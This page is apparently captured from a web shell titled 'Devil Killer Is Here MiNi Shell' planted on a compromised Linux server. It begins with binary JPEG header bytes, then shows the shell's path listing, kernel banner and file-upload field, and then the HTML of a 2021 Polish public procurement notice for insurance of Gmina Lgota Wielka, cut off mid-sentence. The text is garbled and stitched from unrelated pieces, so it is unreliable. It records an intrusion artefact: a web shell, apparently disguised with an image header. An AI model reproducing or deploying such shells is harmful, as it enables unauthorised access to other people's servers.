JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20210408/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20210408/0002981901-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00029819 z dnia 2021-04-08</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa ubezpieczenia Gminy Lgota Wielka wraz z jednostkami organizacyjnymi na okres 3 (trzech) lat. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA LGOTA WIELKA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 590648132</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Radomszczańska 60</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lgota Wielka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">97-565</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL713 - Piotrkowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">446801381</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">446801777</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@lgotawielka.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.lgota.i-bip.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa ubezpieczenia Gminy Lgota Wielka wraz z jednostkami organizacyjnymi na okres 3 (trzech) lat. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8eb6db3e-921c-11eb-86b1-a64936a8669f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00029819</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-04-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://lgota.i-bip.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">- miniportal -https://miniportal.uzp.gov.pl/, - epuap - https://epuap.gov.pl/wps/portal,</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne oraz organizacyjne wysyłania, odbierania dokumentów elektronicznych, oświadczeń i innych znajdują się w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady ( UE ) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE ( ogólne rozporządzenie o ochronie danych ) ( Dz. Urz. UE L 119 z 04.05.2016, str. 1 ) dalej „RODO”, informuję, że:•	Administratorem Pani/Pana danych osobowych jest Gmina Lgota Wielka Dane tele - adresowe Zamawiającego:Gmina Lgota Wielka 97-565 Lgota Wielka, ul. Radomszczańska 60Adres e – mail: gmina@lgotawielka.pl •	Inspektorem danych osobowych w gminie Lgota Wielka jest Pani Monika Szkurłat kontakt: monika.szkurlat@gptogatus.pl .•	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego prowadzonym w trybie przetargu nieograniczonego pn. „Usługa ubezpieczenia Gminy Lgota Wielka wraz z jednostkami organizacyjnymi na okres 3 (trzech) lat” Znak sprawy: RF.V.271.1.2021•	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 Pzp.•	Pani/Pana dane osobowe będą przechowywane oraz archiwizowane przez okres wynikający z obowiązujących przepisów prawa, w szczególności ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, prezesa Rady Ministrów z dnia 18 stycznia 2011 r. w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie organizacji i zakresu działania archiwów zakładowych, w tym przez okres niezbędny do dochodzenia roszczeń;•	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z Pzp;•	W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO;•	Posiada Pani/Pan:- na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;- na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych *;- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzanych danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO **;- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;•	Nie przysługuje Pani/Panu:- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;- prawo do przenoszenia danych osobowych, o których mowa w art. 20 RODO;•	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RF.V.271.1.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest świadczenie usługi ubezpieczenia Gminy Lgota Wielka w zakresie:1.	Pakiet 1 (Część 1 zamówienia)a.	ubezpieczenia mienia od wszystkich ryzyk,b.	ubezpieczenia sprzętu elektronicznego od wszystkich ryzyk,c.	ubezpieczenia odpowiedzialności cywilnej,d.	ubezpieczenia następstw nieszczęśliwych wypadków członków Ochotniczych Straży Pożarnych i Młodzieżowych Drużyn Pożarniczych,e.	ubezpieczenia następstw nieszczęśliwych wypadków osób odpracowujących zaległości w opłatach na rzecz Gminy Lgota Wielka,f.	ubezpieczenia następstw nieszczęśliwych wypadków podopiecznych środowiskowego Domu Samopomocy w Krępie,g.	ubezpieczenia następstw nieszczęśliwych wypadków młodzieży amatorsko uprawiającej sport,h.	ubezpieczenia następstw nieszczęśliwych wypadków Sołtysów i Inkasentów. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66510000-8 - Usługi ubezpieczeniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">66512100-3 - Usługi ubezpieczenia od następstw nieszczęśliwych wypadków</p> <p class="mb-0">66515000-3 - Usługi ubezpieczenia od uszkodzenia lub utraty</p> <p class="mb-0">66515100-4 - Usługi ubezpieczenia od ognia</p> <p class="mb-0">66515200-5 - Usługi ubezpieczenia własności</p> <p class="mb-0">66515400-7 - Usługi ubezpieczenia od skutków żywiołów</p> <p class="mb-0">66516000-0 - Usługi ubezpieczenia od odpowiedzialności cywilnej</p> <p class="mb-0">66516400-4 - Usługi ubezpieczenia od ogólnej odpowiedzialności cywilnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">36 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze oferty najkorzystniejszej dla każdej z części zamówienia odrębnie, zamawiający będzie się kierował następującymi kryteriami:1/ cena oferty ( C ) - 60%2/ dodatkowy, preferowany zakres ubezpieczenia ( Z ) – 40%2.	Sposób oceniania ofert:1/ w kryterium „cena oferty”, w którym Zamawiającemu zależy, aby Wykonawca przedstawił jak najniższą wartość (cena), zostanie zastosowany następujący wzór:liczba Cn	zdobytych ( C ) = ----------- x 100 x waga kryterium 60%punktów Cbgdzie: Cn – cena najniższa wśród ofert nie odrzuconychCb – cena oferty badanej100 - wskaźnik stały – współczynnik proporcjonalności 60 – procentowe znaczenie kryterium cenyLiczba punktów, którą można uzyskać w ramach kryterium cena obliczona zostanie przez podzielenie ceny najniższej z ofert przez cenę ocenianej oferty i pomnożenie tak otrzymanej liczby przez 100 punktów i wagę kryterium, którą ustalono na 60%.2/ w kryterium „dodatkowy, preferowany zakres ubezpieczenia” w którym Zamawiającemu zależy, aby Wykonawca przedstawił jak najwyższą wartość ( ilość punktów uzyskanych za zaakceptowanie klauzul dodatkowych opisanych w formularzu ofertowym ) zostanie zastosowany następujący wzór:liczba Zb	zdobytych ( C ) = ----------- x 100 x waga kryterium 40%punktów 100gdzie: Zb – suma punktów za zaakceptowanie klauzul dodatkowych oferty badanej100 – maksymalna ilość punktów możliwa do uzyskania ( za zaakceptowanie wszystkich klauzul opisanych w formularzu ofertowym )100 - wskaźnik stały – współczynnik proporcjonalności40 – procentowe znaczenie kryterium cenyLiczba punktów, którą można uzyskać w ramach kryterium cena obliczona zostanie przez podzielenie sumy punktów uzyskanych przez Wykonawcę za zaakceptowanie klauzul dodatkowych, preferowanych opisanych w formularzu ofertowym przez maksymalna ilość punktów możliwą do uzyskania ( za zaakceptowanie wszystkich klauzul opisanych w formularzu ofertowym ) i pomnożenie tak otrzymanej liczby przez 100 punktów i wagę kryterium, którą ustalono na 40%.Uwaga:Zamawiający informuje, iż: Klauzula lub ryzyko przyjęte w całości w treści opisanej w SIWZ otrzyma ilość punktów wskazaną w tabeli Formularza ofertowego dla danej klauzuli ( zaznaczona odpowiedź „tak” w kolumnie „2” „akceptujemy w treści opisanej w SWZ” ).Każda klauzula odrzucona otrzyma 0 (zero) punktów ( zaznaczona odpowiedź „tak” w kolumnie „ 3 „ „odrzucamy klauzulę”).W sytuacji gdy wykonawca nie wypełni żadnej z kolumn dla wybranej klauzuli także otrzyma 0 (zero) punktów.3.	Za najkorzystniejszą dla każdej Części zamówienia odrębnie zostanie uznana oferta, która uzyska łącznie największą liczbę punktów (P) wyliczoną zgodnie z poniższym wzorem:P = C + Zgdzie:P – łączna liczba punktów oferty ocenianejC – liczba punktów uzyskanych w kryterium „cena oferty”Z – liczba punktów uzyskanych w kryterium „dodatkowy, preferowany zakres ubezpieczenia”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowy, preferowany zakres ubezpieczenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> 1.	Przy wyborze oferty najkorzystniejszej dla każdej z części zamówienia odrębnie, zamawiający będzie się kierował następującymi kryteriami:1/ cena oferty ( C ) - 60%2/ dodatkowy, preferowany zakres ubezpieczenia ( Z ) – 40%2.	Sposób oceniania ofert:1/ w kryterium „cena oferty”, w którym Zamawiającemu zależy, aby Wykonawca przedstawił jak najniższą wartość (cena), zostanie zastosowany następujący wzór:liczba Cn	zdobytych ( C ) = ----------- x 100 x waga kryterium 60%punktów Cbgdzie: Cn – cena najniższa wśród ofert nie odrzuconychCb – cena oferty badanej100 - wskaźnik stały – współczynnik proporcjonalności 60 – procentowe znaczenie kryterium cenyLiczba punktów, którą można uzyskać w ramach kryterium cena obliczona zostanie przez podzielenie ceny najniższej z ofert przez cenę ocenianej oferty i pomnożenie tak otrzymanej liczby przez 100 punktów i wagę kryterium, którą ustalono na 60%.2/ w kryterium „dodatkowy, preferowany zakres ubezpieczenia” w którym Zamawiającemu zależy, aby Wykonawca przedstawił jak najwyższą wartość ( ilość punktów uzyskanych za zaakceptowanie klauzul dodatkowych opisanych w formularzu ofertowym ) zostanie zastosowany następujący wzór:liczba Zb	zdobytych ( C ) = ----------- x 100 x waga kryterium 40%punktów 100gdzie: Zb – suma punktów za zaakceptowanie klauzul dodatkowych oferty badanej100 – maksymalna ilość punktów możliwa do uzyskania ( za zaakceptowanie wszystkich klauzul opisanych w formularzu ofertowym )100 - wskaźnik stały – współczynnik proporcjonalności40 – procentowe znaczenie kryterium cenyLiczba punktów, którą można uzyskać w ramach kryterium cena obliczona zostanie przez podzielenie sumy punktów uzyskanych przez Wykonawcę za zaakceptowanie klauzul dodatkowych, preferowanych opisanych w formularzu ofertowym przez maksymalna ilość punktów możliwą do uzyskania ( za zaakceptowanie wszystkich klauzul opisanych w formularzu ofertowym ) i pomnożenie tak otrzymanej liczby przez 100 punktów i wagę kryterium, którą ustalono na 40%.Uwaga:Zamawiający informuje, iż: Klauzula lub ryzyko przyjęte w całości w treści opisanej w SIWZ otrzyma ilość punktów wskazaną w tabeli Formularza ofertowego dla danej klauzuli ( zaznaczona odpowiedź „tak” w kolumnie „2” „akceptujemy w treści opisanej w SWZ” ).Każda klauzula odrzucona otrzyma 0 (zero) punktów ( zaznaczona odpowiedź „tak” w kolumnie „ 3 „ „odrzucamy klauzulę”).W sytuacji gdy wykonawca nie wypełni żadnej z kolumn dla wybranej klauzuli także otrzyma 0 (zero) punktów.3.	Za najkorzystniejszą dla każdej Części zamówienia odrębnie zostanie uznana oferta, która uzyska łącznie największą liczbę punktów (P) wyliczoną zgodnie z poniższym wzorem:P = C + Zgdzie:P – łączna liczba punktów oferty ocenianejC – liczba punktów uzyskanych w kryterium „cena oferty”Z – liczba punktów uzyskanych w kryterium „dodatkowy, preferowany zakres ubezpieczenia”. <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet 2 (Część 2 zamówienia) – ubezpieczenia komunikacyjne. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66510000-8 - Usługi ubezpieczeniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">66512100-3 - Usługi ubezpieczenia od następstw nieszczęśliwych wypadków</p> <p class="mb-0">66514110-0 - Usługi ubezpieczeń pojazdów mechanicznych</p> <p class="mb-0">66516100-1 - Usługi ubezpieczenia pojazdów mechanicznych od odpowiedzialności cywilnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">36 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze oferty najkorzystniejszej dla każdej z części zamówienia odrębnie, zamawiający będzie się kierował następującymi kryteriami:1/ cena oferty ( C ) - 60%2/ dodatkowy, preferowany zakres ubezpieczenia ( Z ) – 40%2.	Sposób oceniania ofert:1/ w kryterium „cena oferty”, w którym Zamawiającemu zależy, aby Wykonawca przedstawił jak najniższą wartość (cena), zostanie zastosowany następujący wzór:liczba Cn	zdobytych ( C ) = ----------- x 100 x waga kryterium 60%punktów Cbgdzie: Cn – cena najniższa wśród ofert nie odrzuconychCb – cena oferty badanej100 - wskaźnik stały – współczynnik proporcjonalności 60 – procentowe znaczenie kryterium cenyLiczba punktów, którą można uzyskać w ramach kryterium cena obliczona zostanie przez podzielenie ceny najniższej z ofert przez cenę ocenianej oferty i pomnożenie tak otrzymanej liczby przez 100 punktów i wagę kryterium, którą ustalono na 60%.2/ w kryterium „dodatkowy, preferowany zakres ubezpieczenia” w którym Zamawiającemu zależy, aby Wykonawca przedstawił jak najwyższą wartość ( ilość punktów uzyskanych za zaakceptowanie klauzul dodatkowych opisanych w formularzu ofertowym ) zostanie zastosowany następujący wzór:liczba Zb	zdobytych ( C ) = ----------- x 100 x waga kryterium 40%punktów 100gdzie: Zb – suma punktów za zaakceptowanie klauzul dodatkowych oferty badanej100 – maksymalna ilość punktów możliwa do uzyskania ( za zaakceptowanie wszystkich klauzul opisanych w formularzu ofertowym )100 - wskaźnik stały – współczynnik proporcjonalności40 – procentowe znaczenie kryterium cenyLiczba punktów, którą można uzyskać w ramach kryterium cena obliczona zostanie przez podzielenie sumy punktów uzyskanych przez Wykonawcę za zaakceptowanie klauzul dodatkowych, preferowanych opisanych w formularzu ofertowym przez maksymalna ilość punktów możliwą do uzyskania ( za zaakceptowanie wszystkich klauzul opisanych w formularzu ofertowym ) i pomnożenie tak otrzymanej liczby przez 100 punktów i wagę kryterium, którą ustalono na 40%.Uwaga:Zamawiający informuje, iż: Klauzula lub ryzyko przyjęte w całości w treści opisanej w SIWZ otrzyma ilość punktów wskazaną w tabeli Formularza ofertowego dla danej klauzuli ( zaznaczona odpowiedź „tak” w kolumnie „2” „akceptujemy w treści opisanej w SWZ” ).Każda klauzula odrzucona otrzyma 0 (zero) punktów ( zaznaczona odpowiedź „tak” w kolumnie „ 3 „ „odrzucamy klauzulę”).W sytuacji gdy wykonawca nie wypełni żadnej z kolumn dla wybranej klauzuli także otrzyma 0 (zero) punktów.3.	Za najkorzystniejszą dla każdej Części zamówienia odrębnie zostanie uznana oferta, która uzyska łącznie największą liczbę punktów (P) wyliczoną zgodnie z poniższym wzorem:P = C + Zgdzie:P – łączna liczba punktów oferty ocenianejC – liczba punktów uzyskanych w kryterium „cena oferty”Z – liczba punktów uzyskanych w kryterium „dodatkowy, preferowany zakres ubezpieczenia”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowy, preferowany zakres ubezpieczenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> 1.	Przy wyborze oferty 